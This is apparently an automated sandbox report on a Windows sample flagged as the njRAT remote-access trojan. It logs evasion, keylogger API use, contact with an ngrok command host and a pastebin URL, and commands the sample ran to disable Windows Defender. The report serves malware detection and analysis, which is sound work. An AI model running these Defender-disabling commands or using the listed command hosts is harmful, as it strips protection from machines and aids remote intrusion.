Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Window / User API: threadDelayed 3584 Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Window / User API: threadDelayed 5709 Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Window / User API: foregroundWindowGot 1776 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6366 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3314 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484 Thread sleep count: 155 > 30 Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484 Thread sleep time: -155000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 8128 Thread sleep count: 3584 > 30 Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484 Thread sleep count: 5709 > 30 Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484 Thread sleep time: -5709000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep count: 6366 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep count: 3314 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Disables Windows Defender (via service or powershell)
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Modifies Windows Defender protection settings
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query windefend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop windefend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete windefend Jump to behavior
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager.3.16
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrok.ioH
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrok.ioM
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager b
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: Progman
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managero
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerm
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managermk.ioe
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.000000000318B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrok.io|
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managero?
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager`[
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrok.io
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager|
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerYQ
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disables zone checking for all users
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS Jump to behavior
AV process strings found (often used to terminate AV products)
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Wireshark.exe

Stealing of Sensitive Information
barindex
Yara detected Njrat
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Njrat
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435109 Sample: G1lnGpOLK4.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 46 pastebin.com 2->46 48 0.tcp.eu.ngrok.io 2->48 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 11 other signatures 2->70 9 G1lnGpOLK4.exe 17 4 2->9         started        13 chrome.exe 1 2->13         started        signatures3 68 Connects to a pastebin service (likely for C&C) 46->68 process4 dnsIp5 52 0.tcp.eu.ngrok.io 18.192.31.165, 15155, 49749, 49754 AMAZON-02US United States 9->52 54 pastebin.com 104.20.3.235, 443, 49745, 49753 CLOUDFLARENETUS United States 9->54 56 3.124.142.205, 15155, 49777, 49779 AMAZON-02US United States 9->56 72 Disables zone checking for all users 9->72 74 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->74 76 Modifies Windows Defender protection settings 9->76 78 Disables Windows Defender (via service or powershell) 9->78 15 cmd.exe 1 9->15         started        18 cmd.exe 1 9->18         started        20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        58 192.168.2.4, 138, 15155, 443 unknown unknown 13->58 60 239.255.255.250 unknown Reserved 13->60 24 chrome.exe 13->24         started        signatures6 process7 dnsIp8 82 Modifies Windows Defender protection settings 15->82 84 Disables Windows Defender (via service or powershell) 15->84 27 powershell.exe 23 15->27         started        30 conhost.exe 15->30         started        32 conhost.exe 18->32         started        34 sc.exe 1 18->34         started        36 conhost.exe 20->36         started        38 sc.exe 1 20->38         started        40 conhost.exe 22->40         started        42 sc.exe 1 22->42         started        50 www.google.com 142.251.40.228, 443, 49733, 49734 GOOGLEUS United States 24->50 signatures9 process10 signatures11 80 Loading BitLocker PowerShell Module 27->80 44 WmiPrvSE.exe 27->44         started        process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.20.3.235
 pastebin.com United States
13335 CLOUDFLARENETUS false
239.255.255.250
 unknown Reserved
unknown unknown false
3.124.142.205
 unknown United States
16509 AMAZON-02US false
18.192.31.165
 0.tcp.eu.ngrok.io United States
16509 AMAZON-02US true
142.251.40.228
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.4

Contacted Domains

Name IP Active
www.google.com 142.251.40.228 true
pastebin.com 104.20.3.235 true
0.tcp.eu.ngrok.io 18.192.31.165 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/async/newtab_promos false
    		high
    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
      		high
      https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
        		high
        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
          		high
          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
            		high
            https://pastebin.com/raw/s4TipmJt false
              		high
              0.tcp.eu.ngrok.io true
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              		 unknown